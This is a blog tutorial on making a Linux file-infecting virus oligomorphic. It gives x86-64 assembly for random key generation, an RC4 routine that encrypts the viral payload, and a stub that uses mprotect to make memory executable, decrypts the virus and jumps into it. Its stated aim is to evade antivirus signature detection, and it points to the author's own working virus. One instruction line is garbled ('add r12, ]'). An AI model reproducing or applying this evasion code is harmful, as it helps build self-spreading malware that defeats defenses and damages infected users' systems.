Oligomorphism: How to encrypt our virus and evade signature-based detection
Introduction⌗
Until not so long ago, antiviruses were mostly relying on signatures to detect malware. What it means is that, whenever a file written to disk, downloaded or launched, the antivirus software checks if it is a known malware. To do so, it is doing two things. The first one is hashing the sample and check if that specific sample is present in the known malware database. But some type of malware are “naturally immune” to this kind of analysis. For example, our file infector, except for its first instance that will stay the same all the time, will never get the same hash since it will propagate in different files and that hash analysis is not able to spot infected files. That is why antivirus rely on a second type analysis known as signature-based detection. Once a sample has been found and analyzed, analysts create a signature for this malware, which is a set of rules to identify it. These rules can be plenty of things but are mostly strings present in memory or specific code sequences. With that kind of analysis, once the rules have been written for our infector, the antivirus software will be able to detect our first virus instance but also each infected binaries since they will all contain these specific signatures. That is where oligomorphism comes in. Even though nowadays, security software are much more complex and use a wide variety of detection techniques, they still use signature-based analysis and you should always encrypt any piece of code that you put out there in the will or you will not be able to reuse it once it has been found and that a signature exists for it.
What is oligomorphism ?⌗
Once faced with the problem of antivirus and signature-based detection, virus developers had to adapt. It wasn’t possible anymore to put the same self-replicating piece of code in thousands of files on a system without getting detected. That’s when a technical race started (and is still continuing now) between malicious software writers and security vendors and that race started with oligomorphism. This word comes from two greek roots: Oligo
which means “not much” and morph
which means shape. Oligomorphism is a software that will change its shape but now much. Indeed, the executed code and the internal structure of the virus will always remain the same, the only thing that will change is the way it is written to disk. Since at first, antiviruses were only analyzing the file being written or executed, the point was to write an encrypted version of the virus that will change at each replication so that it is not possible to develop a “universal” signature that will match all the replication of the program.
How does it works ?⌗
The principle itself is very simple, each occurrence of our self-replicating program has to be different. To do so, we will encrypt the virus using a key algorithm and we will change the key at each occurrence so that the result is different all the time. Once we’ve done that, we will bypass the signature-based detection but we still have a (big) problem: our encrypted code is not executable anymore. To remedy that, we will have to add a decryptor, that we won’t encrypt so that it stays executable. By doing so, the executed code will be completely different than the one present in the file which is why it will bypass the antivirus and still keep its integrity because the executed code will remain the same at each occurrence.
Let’s code now⌗
I will only put code chunks concerning encryption in this article, if you want to check a fully-working oligomorphic virus, here is the link to one of mine.
First we have to choose an algorithm to encrypt our virus. It is usually a good solution to work with XOR-based algorithms. The advantage of XOR is that it is reversible and it will break code patterns and have a better entropy than ROT-based algorithms. I’ve chosen to use the RC4 algorithm that generates a pseudo random bytes stream and it has the advantage that we can use the same algorithm to encrypt and decrypt our function.
To proceed, we first want to generate a random key. To do so, we will use the /dev/urandom
file that is a continuous random byte stream. I’ve chosen to use a 32 bytes key but it can work with any number even though it is better to choose a power of two.
generate_key:
push rbp
mov rbp, rsp
push rdi
lea rdi, [rel key_file] ; /dev/urandom
xor rsi, rsi ; O_RDONLY
mov eax, SYS_OPEN
syscall
cmp eax, 0
jl _end ; in case we cannot get a key and therefore encrypt our virus
push rax
mov rdi, rax
lea rsi, [rel key] ; where our key will be stored
mov rdx, key_len
mov eax, SYS_READ
syscall
pop rdi
mov eax, SYS_CLOSE
syscall
leave
ret
Then we will code the RC4 routine (if you want to more about the algorithm, you can visit its Wikipedia page). It is simply the reimplementation of the Wikipedia pseudo-code in ASM.
; rdi crypt_pointer
; rsi crypt_len
rc4:
push rbp
mov rbp, rsp
sub rsp, 0x120 ; we reserve space on the stack for the vector
sub rsp, rsi
mov [rsp], rdi
mov [rsp + 0x8], rsi
mov rcx, 0x100
xor al, al
lea rdi, [rsp + 0x10]
loop_init_vector:
stosb
inc al
loop loop_init_vector ; we have a [0...255] vector
xor r8, r8
xor r9, r9
lea rdi, [rel key]
lea rsi, [rsp + 0x10]
mov cx, 0x100
rc4_init_loop: ; we now modify the vector with the random bytes of the key
mov rax, r8 ; the advantage of a power of 2 key is that we can use the AND operator
and rax, 0x1f ; instead of DIV and MOD
add rax, rdi
movzx rdx, BYTE [rax]
mov rbx, r8
add rbx, rsi
movzx r10, BYTE [rbx]
add r9, r10
add r9, rdx
movzx r9, r9b
mov rax, r9
add rax, rsi
mov dl, BYTE [rax]
mov BYTE [rax], r10b
mov BYTE [rbx], dl
inc r8
loop rc4_init_loop
rc4_crypt: ; then we encrypt our payload with the generated vector
mov rcx, [rsp + 0x8]
lea rdi, [rsp + 0x110]
mov rsi, [rsp]
lea r10, [rsp + 0x10]
xor r8, r8
xor r9, r9
rc4_crypt_loop:
inc r8
movzx r8, r8b
mov r11, r10
add r11, r8
add r9b, [r11]
movzx r9, r9b
mov r12, r10
add r12, ]
mov dl, [r12]
mov bl, [r11]
mov [r12], bl
mov [r11], dl
mov dl, [r11]
add dl, [r12]
movzx rdx, dl
add rdx, r10
mov al, [rdx]
xor al, BYTE [rsi]
mov BYTE [rdi], al
inc rdi
inc rsi
loop rc4_crypt_loop
mov rdi, [rsp]
lea rsi, [rsp + 0x110]
mov rcx, [rsp + 0x8]
copy_crypted_mem: ; and we copy the encrypted payload in the memory
lodsb
stosb
loop copy_crypted_mem
leave
ret
Now that we have the algorithm that is gonna encrypt and decrypt our payload, we can use it before copying our payload so that we copy an encrypted version. The last thing that we need to handle is decryption. You should be familiar with the code bouncing technique described in this article. Since we now have to decrypt the payload, it will be simpler to put it always at the same place and therefore use this technique so that we are nopt limited by the space available in the binary.
Here is the code of the new payload that will be put in the .text
and that will call the decryptor before jumping on the decrypted code. Of course, the decryptor has to not be encrypted. I put it after the .text
but it would also be great to put it just before the viral code though we would need to calculate the offset of the decryptor to be able to call it.
payload_mprotect:
push rbx
push r12
lea rdi, [rel payload_mprotect]
add rdi, [rel data_addr_offset]
mov rsi, [rel data_len]
mov rdx, PROT_READ | PROT_WRITE | PROT_EXEC
xor rax, rax
add rax, SYS_MPROTECT ; gives execution rights to the payload
syscall
lea rdi, [rel payload_mprotect]
add rdi, [rel data_addr_offset]
add rdi, [rel data_len]
sub rdi, virus_len
mov rsi, virus_len
push rdi
call rc4 ; decrypts the payload
pop rax
call rax ; jumps on the viral code
pop r12
pop rbx
final_jump_opcode: db 0xe9 ; jumps back to the original entrypoint
final_jump: dd _end - $ - 4
final_jump_offset equ final_jump - _start
final_jump_offset_text equ final_jump - payload_mprotect
Conclusion⌗
Now, you’ve seen the basis of oligomorphism and how to make your virus oligomorphic. Even though it helps a great deal to counter signature-based detection, there is still one part of the code that stays constant, it is the decryptor and there could be a signature developed for it.
To counter this, the next step in our malware developer journey is polymorphism and metamorphism and that is where the real fun comes in! The point of polymorphism is that not all generation of our virus use the same decryptor so that there cannot be a unique signature produced. Once security vendors understood that files were not gonna contain signatures anymore, they decided to sandbox the software before executing them for real. It means that it will be executed in a controlled-environment and then the process memory will be analyzed. Once decrypted, our payload is constant and looking for its signature inside the memory would prove successful so to avoid that, we can write metamorphic code. It means self-modifying code, each time our infector will replicate, it will provide a totally different payload though it will still achieve the same function. I’m still working on my metamorphic engine and will come back for another article once it is ready.